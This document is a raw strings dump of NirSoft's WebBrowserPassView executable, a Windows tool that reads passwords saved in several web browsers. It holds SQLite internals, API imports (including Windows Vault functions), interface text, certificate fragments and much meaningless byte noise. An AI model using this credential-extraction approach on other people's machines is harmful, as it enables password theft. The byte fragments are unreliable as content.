interrupted
attempt to write a readonly database
database table is locked
database is locked
callback requested query abort
access permission denied
SQL logic error or missing database
not an error
wal
memory
truncate
off
persist
delete
foreign_keys
recursive_triggers
read_uncommitted
omit_readlock
writable_schema
automatic_index
reverse_unordered_selects
checkpoint_fullfsync
fullfsync
legacy_file_format
empty_result_callbacks
count_changes
short_column_names
full_column_names
group_concat
count
avg
total
sum
zeroblob
replace
total_changes
changes
last_insert_rowid
quote
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_source_id
sqlite_version
nullif
randomblob
random
ifnull
hex
coalesce
lower
upper
abs
substr
length
typeof
max
min
trim
rtrim
ltrim
 REAL
 INT
 NUM
 TEXT
sqlite_attach
sqlite_detach
tbl,idx,stat
sqlite_stat1
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_table
win32
current_timestamp
%Y-%m-%d %H:%M:%S
current_date
%Y-%m-%d
current_time
%H:%M:%S
THREADSAFE=1
TEMP_STORE=1
OMIT_XFER_OPT
OMIT_UTF16
OMIT_TRACE
OMIT_TEMPDB
OMIT_TCL_VARIABLE
OMIT_SHARED_CACHE
OMIT_SCHEMA_VERSION_PRAGMAS
OMIT_SCHEMA_PRAGMAS
OMIT_QUICKBALANCE
OMIT_PROGRESS_CALLBACK
OMIT_PAGER_PRAGMAS
OMIT_OR_OPTIMIZATION
OMIT_MEMORYDB
OMIT_LOAD_EXTENSION
OMIT_INTEGRITY_CHECK
OMIT_FLOATING_POINT
OMIT_EXPLAIN
OMIT_DATETIME_FUNCS
OMIT_COMPOUND_SELECT
OMIT_CHECK
OMIT_CAST
OMIT_BUILTIN_TEST
OMIT_BETWEEN_OPTIMIZATION
OMIT_AUTOVACUUM
OMIT_AUTOINCREMENT
OMIT_AUTHORIZATION
SQLITE_
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
NULL
(NULL)
922337203685477580
API call with %s database connection pointer
unopened
invalid
%s-shm
etilqs_
%s\etilqs_
OsError 0x%x (%u)
-journal
-wal
Recovered %d frames from WAL file %s
@  
out of memory
%lld
%!.15g
%s%s
%s-mj%08X
foreign key constraint failed
API called with finalized prepared statement
API called with NULL prepared statement
string or blob too big
unable to use function %s in the requested context
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
rollback
release
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot start a transaction within a transaction
cannot rollback - no transaction is active
cannot commit - no transaction is active
database schema has changed
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
too many levels of trigger recursion
into
out of
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
null
real
integer
new
old
misuse of aliased aggregate %s
no such column
ambiguous column name
%s: %s.%s.%s
%s: %s.%s
%s: %s
misuse of aggregate function %.*s()
no such function: %.*s
wrong number of arguments to function %.*s()
%r %s BY term out of range - should be between 1 and %d
too many terms in ORDER BY clause
ORDER
%r ORDER BY term does not match any column in the result set
too many terms in %s BY clause
a GROUP BY clause is required before HAVING
GROUP
aggregate functions are not allowed in the GROUP BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
_ROWID_
ROWID
OID
oversized integer: %s%s
misuse of aggregate: %s()
unknown function: %.*s()
RAISE() may only be used within a trigger-program
%.*s"%w"%s
%s%.*s"%w"
name=%Q
%s OR name=%Q
type='trigger' AND (%s)
tbl_name=%Q
there is already another table or index with this name: %s
sqlite_
table %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a UNIQUE column
Cannot add a REFERENCES column with non-NULL default value
Cannot add a NOT NULL column with default value NULL
Cannot add a column with non-constant default
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
virtual tables may not be altered
Cannot add a column to a view
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
aaa
SELECT tbl, idx, stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
cannot ATTACH database within transaction
database %s is already in use
database is already attached
attached databases must use the same text encoding as main database
unable to open database: %s
no such database: %s
cannot detach database %s
cannot DETACH database within transaction
database %s is locked
%s %T cannot reference objects in database %s
no such view
no such table
corrupt database
unknown database %T
object name reserved for internal use: %s
table %T already exists
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
INTEGER
no such collation sequence: %s
CREATE TABLE 
table
TABLE
view
VIEW
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
tbl_name='%q'
parameters are not allowed in views
view %s is circularly defined
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
index
altertab_
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
conflicting ON CONFLICT clauses specified
 UNIQUE
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
name='%q' AND type='index'
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
USING
a JOIN clause is required before %s
unable to open a temporary database file for storing temporary tables
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
rows deleted
text
blob
integer overflow
LIKE or GLOB pattern too complex
ESCAPE expression must be a single character
MATCH
like
glob
BINARY
foreign key mismatch
oid
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
rows inserted
%s.%s may not be NULL
PRIMARY KEY must be unique
columns 
column 
 are not unique
 is not unique
automatic extension loading failed: %s
SET NULL
SET DEFAULT
CASCADE
RESTRICT
NO ACTION
-%T
foreign_key_list
seq
from
on_update
on_delete
match
NONE
case_sensitive_like
compile_options
compile_option
wal_checkpoint
wal_autocheckpoint
malformed database schema (%s)
%s - %s
invalid rootpage
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
statement too long
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
only a single result allowed for a SELECT that is part of an expression
rowid
%s.%s
%s:%d
no such index: %s
sqlite_subquery_%p_
no such table: %s
no tables specified
too many columns in result set
DISTINCT aggregates must have exactly one argument
temporary trigger may not have qualified name
trigger
cannot create triggers on virtual tables
trigger %T already exists
cannot create trigger on system table
BEFORE
AFTER
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
type='trigger' AND name='%q'
no such trigger: %S
no such column: %s
rows updated
_rowid_
cannot VACUUM from within a transaction
cannot VACUUM - SQL statements in progress
ATTACH ':memory:' AS vacuum_db;
ATTACH '' AS vacuum_db;
PRAGMA vacuum_db.synchronous=OFF
BEGIN EXCLUSIVE;
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14)   FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence'   AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14)  FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' 
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21)   FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence'   AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' 
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master   SELECT type, name, tbl_name, rootpage, sql    FROM main.sqlite_master   WHERE type='view' OR type='trigger'      OR (type='table' AND rootpage=0)
CREATE VIRTUAL TABLE %T
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
name='%q' AND type='table'
vtable constructor failed: %s
vtable constructor did not declare schema: %s
hidden
 hidden
no such module: %s
NOCASE
auto-index
table %s: xBestIndex returned an invalid plan
at most %d tables in a join
cannot use index: %s
parser stack overflow
set list
near "%T": syntax error
too many arguments on function %T
qualified table names are not allowed on INSERT, UPDATE, and DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
interrupt
unrecognized token: "%T"
temp
2011-01-28 17:03:50 ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
unable to close due to unfinalised statements
unable to close due to unfinished backup operation
unknown error
unable to delete/modify user-function due to active statements
unknown database: %s
unable to delete/modify collation sequence due to active statements
no such vfs: %s
RTRIM
main
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
\sqlite3.dll
\mozsqlite3.dll
\nss3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
sqlite3_column_text
sqlite3_column_int
sqlite3_column_int64
sqlite3_finalize
sqlite3_close
sqlite3_exec
\StringFileInfo\
\VarFileInfo\Translation
%4.4X%4.4X
040904E4
ProductName
FileDescription
FileVersion
ProductVersion
CompanyName
InternalName
LegalCopyright
OriginalFileName
log profile
.save
signIn
vaultcli.dll
VaultOpenVault
VaultCloseVault
VaultEnumerateItems
VaultFree
VaultGetInformation
VaultGetItem
?RSDSiL
f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb
wcscat
_snwprintf
wcsncat
strlen
memset
wcscpy
memcpy
wcschr
_wcsicmp
_wtoi
wcslen
_purecall
log
abs
wcscmp
memcmp
??2@YAPAXI@Z
??3@YAXPAX@Z
_wcsnicmp
wcsrchr
strcpy
strcmp
malloc
wcstoul
_memicmp
modf
free
wcsncmp
_strlwr
strchr
_wcslwr
_wcsupr
_itow
qsort
strftime
_gmtime64
realloc
memchr
msvcrt.dll
__dllonexit
_onexit
_c_exit
_exit
_XcptFilter
_cexit
exit
_wcmdln
__wgetmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
_except_handler3
ImageList_ReplaceIcon
ImageList_Create
ImageList_AddMasked
ImageList_SetImageCount
CreateStatusWindowW
CreateToolbarEx
COMCTL32.dll
GetFileVersionInfoW
VerQueryValueW
GetFileVersionInfoSizeW
VERSION.dll
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WININET.dll
LocalFree
GetFileSize
SystemTimeToFileTime
CloseHandle
FileTimeToLocalFileTime
DeleteFileW
CopyFileW
CreateFileW
WriteFile
WideCharToMultiByte
FreeLibrary
LoadLibraryW
GetProcAddress
GetLastError
SetFilePointerEx
CompareFileTime
GetCurrentDirectoryW
ExpandEnvironmentStringsW
MultiByteToWideChar
GlobalLock
FormatMessageW
GetVersionExW
FindClose
GetTempFileNameW
FindFirstFileW
GetFileAttributesW
GetWindowsDirectoryW
GetModuleHandleW
SetFilePointer
ReadFile
GetModuleFileNameW
LockResource
lstrcpyW
lstrlenW
FindResourceW
LoadResource
GlobalAlloc
GlobalUnlock
LoadLibraryExW
GetTempPathW
FindNextFileW
SizeofResource
GetFileTime
MapViewOfFile
UnmapViewOfFile
CreateFileMappingW
GetCurrentProcess
DuplicateHandle
OpenProcess
GetCurrentProcessId
WritePrivateProfileStringW
GetPrivateProfileIntW
EnumResourceNamesW
GetPrivateProfileStringW
GetStdHandle
SetErrorMode
ReadProcessMemory
ExitProcess
SetCurrentDirectoryW
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
EnumResourceTypesW
UnlockFileEx
GetTempPathA
GetSystemTimeAsFileTime
FormatMessageA
LockFileEx
GetSystemTime
EnterCriticalSection
AreFileApisANSI
GetFullPathNameW
GetDiskFreeSpaceW
DeleteFileA
GetFullPathNameA
InitializeCriticalSection
CreateFileA
GetDiskFreeSpaceA
Sleep
GetSystemInfo
SetEndOfFile
LeaveCriticalSection
GetFileAttributesA
QueryPerformanceCounter
GetFileAttributesExW
DeleteCriticalSection
InterlockedCompareExchange
UnlockFile
FlushFileBuffers
LockFile
GetTickCount
GetModuleHandleA
GetStartupInfoW
KERNEL32.dll
ChildWindowFromPoint
LoadCursorW
SetCursor
GetSysColorBrush
ShowWindow
SetWindowTextW
SetDlgItemInt
UpdateWindow
SetDlgItemTextW
GetDlgItemTextW
GetClientRect
GetSystemMetrics
DeferWindowPos
CreateWindowExW
GetWindowRect
SendDlgItemMessageW
GetDlgItemInt
EndDialog
SetWindowLongW
GetDlgItem
InvalidateRect
GetWindowPlacement
LoadAcceleratorsW
DefWindowProcW
SendMessageW
PostMessageW
RegisterClassW
MessageBoxW
TranslateAcceleratorW
SetMenu
SetWindowPlacement
LoadImageW
LoadIconW
GetWindowLongW
SetFocus
MoveWindow
GetMenuStringW
GetMenuItemCount
CheckMenuItem
CloseClipboard
GetCursorPos
GetParent
SetClipboardData
GetSysColor
EnableWindow
GetMenu
MapWindowPoints
GetDC
GetSubMenu
EmptyClipboard
EnableMenuItem
ReleaseDC
GetClassNameW
OpenClipboard
GetWindowTextW
LoadMenuW
ModifyMenuW
GetMenuItemInfoW
GetDlgCtrlID
DestroyMenu
DialogBoxParamW
CreateDialogParamW
EnumChildWindows
DestroyWindow
LoadStringW
SetWindowPos
PostQuitMessage
GetMessageW
DrawTextExW
IsDialogMessageW
TranslateMessage
BeginDeferWindowPos
DispatchMessageW
EndDeferWindowPos
RegisterWindowMessageW
TrackPopupMenu
USER32.dll
CreateFontIndirectW
DeleteObject
SetTextColor
SetBkMode
GetDeviceCaps
SelectObject
GetStockObject
SetBkColor
GetTextExtentPoint32W
GDI32.dll
GetOpenFileNameW
GetSaveFileNameW
FindTextW
comdlg32.dll
RegCloseKey
RegEnumValueW
RegOpenKeyExW
RegEnumKeyExW
RegQueryValueExW
ADVAPI32.dll
ShellExecuteW
SHGetFileInfoW
SHGetMalloc
SHGetPathFromIDListW
SHBrowseForFolderW
SHELL32.dll
CoUninitialize
CoInitialize
CoTaskMemFree
ole32.dll
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
M]A
K`A
kaA
]"C
0"C
]"C
0"C
]"C
@@ 
@@ 
@ @
@@ 
@@ 
@@ 
@@ 
@@ 
@@ 
abe2869f-9b47-4cd9-a358-c22904dba7f7
wwwwwp
wwwwwwwwwwwwwwwwwwww~gww
wwwwwwwwwwwwwwN
www
wwwwww~fww
wwwww
wwwwwwwwwwp
www
www
wwwp
w~f`
wwwwwwwwwwxwwN
www
wwwwpw~fhw
wwwwwwwwwwx
wwwwp
fhw
""'
wwwwwwwwwwx
wwww`
fhw
r/fw
wwwwwwwwww
wwwwww
wwww
wwwwwwwwwx
`hw
wwwwwwwwwx
fhw
wwwwwwwwwx
fhw
vo"
wwwwwwwwww
Gww
fhw
""'
wwwwwwwwwwx
wwww
Gww
fhw
wwwwwwwwwwx
wwwwwwp
Gww
wwwwwwwwwwx
wwwwwwww
Gwwp
xpwwwwwwwwwwwx
wwwwwwwwwwwp
Gwwp
wwwwwwwwwwwx
wwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwww(
wwwx
$-#
Jc)
cwN
Jc)
$-#
ko^
AJ,
BC@
$-#
cc!
BC@
AJ,
cwN
$-#
ko^
R{Z
kcJ
BC@
:Ii
:Ii
:Ii
$-#
&*@
BC@
&*@
&*@
R{Z
BC@
&*@
&*@
&*@
&*@
$-#
BC@
$-#
AJ,
:Ii
BC@
$-#
BC@
_sp
kcJ
&*@
kcJ
Gmk
cc!
kcJ
&*@
Gmk
kcJ
kcJ
BC@
&*@
+TZ
w[4
*.)7l=
r |=
UC7N
M>: C
Trb
,Z%
Z:$
EH5
/4)
;f1
jW:
#5K
QWU
Gah
bg%e
Dpr
Kf+
9Y%
KYy(6
dz\
MI0
Z@ 
L?2
); Sg
eV$
SG4
5B/:w
bnM
pqa
_qS
SzZs
tcc
9IC*
66p?||
/1'
!$I
4!'
5-9
67C
)T}
&+:D!
3+A
&#)
H:7
..(
+Ep
4Ls
MTD
8<K
Zpg
_@"
pcG
$!4N
kdM
L+-
c_K
5JEw%Xg
&3?
P%%
0BB
0PP
`XX
pNN
0/.
PPN
\\Y
GFB
998
11.
xVWW
998
,WXW
""!
;;;
iko
1uuu
!"!
Hstu
GHH
%&&@bcd
\\\
\\\
HII
<<<_
ilm
'&&<
OOO
   )
opp
((( 
zzz
UUUZ
uPPP*
...(+++JFGG
r<6
&File
&Save Selected Items
Ctrl+S
&Properties
Alt+Enter
E&xit
&Edit
&Find
Ctrl+F
&Copy Selected Items
Ctrl+C
Copy &Password
Ctrl+P
Select &All
Ctrl+A
Deselect All
Ctrl+D
&View
Show &Grid Lines
Show &Tooltips
Mark &Odd/Even Rows
&HTML Report - All Items
HTML R&eport - Selected Items
Choose Colum&ns
&Auto Size Columns
Ctrl+Plus
&Refresh
&Options
&Advanced Options
&Help
&About
Popup1
&Save Selected Items
Ctrl+S
&Copy Selected Items
Ctrl+C
Copy &Password
Ctrl+P
HTML Report - All Items
HTML Report - Selected Items
Choose Colum&ns
&Auto Size Columns
Ctrl+Plus
&Properties
Alt+Enter
&Refresh
Properties
MS Sans Serif
Exception !
MS Sans Serif
Copy Exception
_hP
Continue
Terminate Application
The following application error has occurred:
If this problem persists, copy the above exception information to the clipboard, and send it to the author of this software.
Advanced Options
MS Shell Dlg
Load Passwords From...
Internet Explorer
Google Chrome
Safari
Mozilla Firefox
Opera
SeaMonkey
Cancel
Firefox Options
Master password:
Firefox Profile:
...
Firefox Installation:
...
Chrome Options
User Data Folder:
...
Opera Options
wand.dat file:
...
MS Sans Serif
("v
Translation:
Column Settings
MS Shell Dlg
SysListView32
Move &Up
Move &Down
&Show
&Hide
Default
Cancel
Check the columns that you would like to make visible. Use the Move Up and Move Down buttons to reorder the columns
Width of selected column (in pixels):
%d Passwords
, %d Selected
Created by using
Select a filename to save
Web Browser Passwords%Choose another Firefox profile folder)Choose the installation folder of Firefox,Choose another profile of Chrome Web browser,Choose the password file of Opera (wand.dat)
Loading... %d
Text File
Tab Delimited Text File
Tabular Text File
HTML File - Horizontal
HTML File - Vertical
XML File
Comma Delimited Text File
KeePass csv file
Opera Password File
All Files
Internet Explorer 4.0 - 6.0
Internet Explorer 7.0 - 9.0
Firefox 1.x
Firefox 2.x
Firefox 3.0
Firefox
Chrome
Opera
Safari
Internet Explorer 10.0
SeaMonkey
URL
Web Browser
User Name
Password
Password Strength
User Name Field
Password Field
Very Weak
Weak
Medium
Strong
Very Strong
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
NirSoft
FileDescription
WebBrowserPassView
FileVersion
1.45
InternalName
WebBrowserPassView
LegalCopyright
Copyright 
 2011 - 2013 Nir Sofer
OriginalFilename
WebBrowserPassView.exe
ProductName
WebBrowserPassView
ProductVersion
1.45
VarFileInfo
Translation
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
    </dependentAssembly>
  </dependency>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX`
Z0X03
<<<Obsolete>>
>0!0
0o1
SE1
AddTrust AB1&0$
AddTrust External TTP Network1"0 
AddTrust External CA Root0
050607080910Z
200530104838Z0
US1
UT1
Salt Lake City1
The USERTRUST Network1!0
http://www.usertrust.com1
UTN-USERFirst-Object0
n>1
wjA
dy(
[(M
=0;09
3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
)0'0%
http://ocsp.usertrust.com0
MB/
9f*<Z,m
@E&
&I+j
US1
UT1
Salt Lake City1
The USERTRUST Network1!0
http://www.usertrust.com1
UTN-USERFirst-Object0
100510000000Z
150510235959Z0~1
GB1
Greater Manchester1
Salford1
COMODO CA Limited1$0"
COMODO Time Stamping Signer0
6p"
GS@(YC
YCX
vn~
F@@!
D?0
XF~
[(M
}Pb 
;0907
1http://crl.usertrust.com/UTN-USERFirst-Object.crl05
)0'0%
http://ocsp.usertrust.com0
uu,:
]HO
*5C|k
// 
"A"
MZX
Jvs
t6L
7pc
+<0
US1
UT1
Salt Lake City1
The USERTRUST Network1!0
http://www.usertrust.com1
UTN-USERFirst-Object0
110824000000Z
200530104838Z0{1
GB1
Greater Manchester1
Salford1
COMODO CA Limited1!0
COMODO Code Signing CA 20
(@h
jcX
"%jl
,ly
O1[P!
[,V
Q1/
w#*OY
[(M
h|%
;0907
1http://crl.usertrust.com/UTN-USERFirst-Object.crl0t
h0f0=
1http://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
http://ocsp.usertrust.com0
]ZB^
fKF
Y.yI
mP5\
5a=
=q/;
X~E
<a~^I
0{1
GB1
Greater Manchester1
Salford1
COMODO CA Limited1!0
COMODO Code Signing CA 20
120917000000Z
140917235959Z0
IL1
525831
Gush Dan1
Ramat Gan1
5 Hashoshanim st.1
Nir Sofer1
Nir Sofer0
6[i
1)"
xcM-
zj`
0_<`
jEy
f$i
+NX
h|%
-;_R
?0=0;
0+0)
https://secure.comodo.net/CPS0A
:0806
0http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
f0d0<
0http://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
http://ocsp.comodoca.com0
support@nirsoft.net0
#kX
/f3
0qP9o
ZI@
3~A
{aL
@mM
@G3$
,0e
-Qi
D,j
0{1
GB1
Greater Manchester1
Salford1
COMODO CA Limited1!0
COMODO Code Signing CA 2
:D:
;~u+
TE(
-66B
NFn
US1
UT1
Salt Lake City1
The USERTRUST Network1!0
http://www.usertrust.com1
UTN-USERFirst-Object
131113095028Z0#
oE~
"T.#
&[T/R
tDq
5d|
Y2I
Ne|
RoL:A
:K.
uRy
Qsqih
F~.0
]'~C-
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.rsrc
QS3
SUVW3
X$A
BB%
@@@
^][
<Wj
L A
Pj0h
j0h
SVW
YY3
u&j
P A
H A
D A
=HsA
hHsA
hX$A
_^[
<+u
:=tC
=t6
h$A
L!A
| A
hf$A
Nt'-
u'f
X"A
B99t]
[_^
PVW
hh4A
hxEA
| A
t|VW
}2j
u$9M
p"A
4"A
<"A
tEHt;
_^]
@SVW
\$43
D$(
\$ 
\$$
D$@ 
\$8
\$D
\$<
,A<
,a<
,0<
, <
D$ 
,:<
,[<
D$$;
D$<
9D$D~ 
;D$D}
L$8
@;D$D|
D$4Yu
(EA
 EA
D$<
D$0
D$0
D$0
D$0
\$0F;t$(
9\$
9\$
9\$
9\$ t
9\$
9\$$t
9\$
\$0
9\$@
|$0YY
L$0
|$0
t$0t
t$8
9\$8t
t$8
j P
YYt
@j P
YYt
S@P
YF[
QQVW
x$A
~#S
:=t7
=t%
F;u
SVW
YYs
hf$A
Ph$%A
h%A
hL%A
PhT%A
ht%A
YYs
ht%A
Yu$3
SVh
_^[
SVW
_^[
QSV
YYu
YYu
_^[Y
D$$P
|$ 
ts9]
tUh
SPf
D$)P
PPj
QPP
D$*P
|$ 
|$!
D$"
9T$
rlP
D$*PQ
|$ 
uT9
D$!
D$ P
t!SSj
t$ 
t$(SS
SVW
EX,&A
<&A
E H&A
E$T&A
E(d&A
E<p&A
Eh4'A
t=L
uxj
PhL'A
Ph`'A
Phd&A
t=,V
t=\V
t=<V
YYV
_^[
SVW
E@t'A
E <&A
E$H&A
E,d&A
Eh (A
El4(A
t=P
t= 
hD(A
hT(A
t'hd&A
t=0
t=`
t=@
YYV
_^[
SSj
PSS
SW3
PCS
u>V
PCS
u\W
SW3
PCS
Ph\(A
Phh(A
ht(A
Vj}X
Ph()A
Ph0)A
Ph@)A
PhL)A
PhX)A
Phd)A
Php)A
u`V
hf$A
SVW
SPh
[SVh
t"j@V
_^[t
j=P
YYt @P
^_[
hf$A
h,*A
2B;
PhX)A
Ph<*A
PhL*A
Ph\*A
Phh*A
Phx*A
t:W
SVW
j@P
_^[t
SVW
j@P
_^[t
j:P
YYW
j@P
SVW
j@P
YYt
_^[
SVW
9\$
_^[
u+VWj
SV3
SPf
SSV
PSh
X9E
SVW
<"u
f$A
YYC
YY_^[
QSVW
t0h
VVV
h +A
h`,A
Pht(A
Ph\-A
YYj
_^[
SVWh8=A
x=A
 hX$A
_^[
hh>A
h<.A
YYVW
YY_^
T7A
`7A
X7A
D1A
D1A
4/A
`7A
$/A
,/A
0/A
8/A
GPP
d A
`7A
$/A
,/A
0/A
4/A
8/A
D1A
T`A
hH.A
SSj
SSj
j@P
^u0
j@P
YYt
_@[
_[u
SVW
hh.A
8hp.A
YYu
hx.A
YYu
_^[
h</A
t]W
hL/A
hX/A
hd/A
hp/A
QQSVWh
t(h
0 A
_^[u
j0h
0V3
PVh
jjh
VWj
G;}
SVWj
~!j
YYF;
_^[
QSVj
YYNy
^[Y
QVWj
~)j
_^Y
,Wj
(VWj
333310
33331
SU3
j?_#
SUV
``A
``A
``A
``A
``A
``A
``A
``A
9|$
_^]3
(SV
QSWh
WWh
w9WWh2
SWh
YYu
C;]
SVW
SSh
j&Sh6
SSh
f$A
XPS
 "A
_^[
NSVW
~!3
YYf
YYf
_^[
tMh
t7#
SP3
QQSV3
QSP
 "A
Y^[
SVu3
uzh
YYj
YYt
SUV
YWP
 "A
_^]
$"A
GW3
VVh
WVVh
WVVh
WVVh
VVWh
VVWh
VVWh
VVWh
VWWh
VWWW
VWWj
("A
QSV
Vh(0A
VWPS
(!A
h40A
YY^[
PPj
PPj
hD0A
hH0A
j0h
9D$
p"A
4"A
D"A
0"A
tnSVWj
t4S
PVW
P"A
_^[
l"A
0"A
tJSWU
t*W
SUP
P"A
l"A
|FS
VSP
<0\t
SVj<3
D$$
j\V
hx4A
L A
h"A
hX0A
=PuA
PuA
XvA
XvA
YY^
PQQ
\$ 
L$ 
L$ 
L$ 
L$ 
YY3
SVWj
,"A
5\ A
@"A
FVAQPW
8"A
_^[
f$A
h|0A
D!A
j Y;
hx0A
YY|
YY}
vcVj
VW3
< u
&;}
GFF;u
@_^
~rV
SVW
F;u
_^[
QQSVW
>;E
G;}
_^[
QSVW
f$A
Yt<Wj
0S3
uA9]
u<9]
f$A
{<"u
uN< tf
 9]
f$A
_^[
;A0}
f$A
9~0~
YYt
G;~0|
Vt-
hp0A
YYt
ht0A
YYt
SVW
_^[]
tCSUW
YYs
_][
$!A
tm@
;\$
_^[
9;|$
SVW3
t{SSh
_^[
PGW
SVW
SPf
SPf
PSS
PSS
GG9M
C;]
_^[
SVW
_^[
\$$
uUh
SV3
D$`
\$`
\$d
9\$t
PSS
D$|
 1A
|$|P
9\$
D$ 
9\$
t$ 
hyA
D$8
D$,J
D$0hyA
D$4
D$$P
D$0P
D$<P
SPf
L$0
t$,
D$`
D$\
D$d
D$h
D$X
D$H
D$T
j:Pf
D$T
D$X
D$D
T$<R
t$(
D$ 
;D$
T$p
t$`
_^[
=@uA
@uA
DuA
HuA
(uA
DuA
0uA
DuA
5HuA
4uA
,uA
=@uA
8uA
0uA
t0@;
HuA
5,uA
4uA
=(uA
tDhd1A
5,uA
5,uA
Yu.
HuA
5,uA
HuA
5,uA
H"A
<uA
@uA
8uA
DuA
(uA
5,uA
8uA
<uA
4uA
8uA
0uA
<uA
8uA
<uA
f$A
SVW
T"A
D$MSP
D$H
D$<
D$$0
D$,6
t$P
\$X
|"A
8\$H
|$(V
D$Tj
9\$,
t#9]
YYt49\$
PWh
9\$,t
t$0
;D$
_^[
VhP1A
tMVW
PV3
X"A
PVW
5x"A
Y_^]
|!A
YYt
tgh
hX1A
PhH1A
x"A
 Wj
Vhf$A
Phf$A
Phf$A
 Wj
T"A
D$ESP
D$@
D$4
D$ 0
D$$6
D$H
\$0
\$P
|"A
td8\$@tH
D$@j
YYt
9\$$
D$ t
L$@QP
YY9\$$t
t$(
G;|$
SVW
|!A
~[8
h"A
ht1A
YYt
YY_3
^@[
VuD
hP1A
x!A
hX1A
PhH1A
YYSh
x"A
_[3
YtyVW
hl1A
@j?h
j?h
HsA
SVW
hl1A
f$A
hd1A
H"A
YYG
j.V
$S3
Wt{
@@f9
}aB
|>f
$SW3
PWh
G;~
SWV
 3A
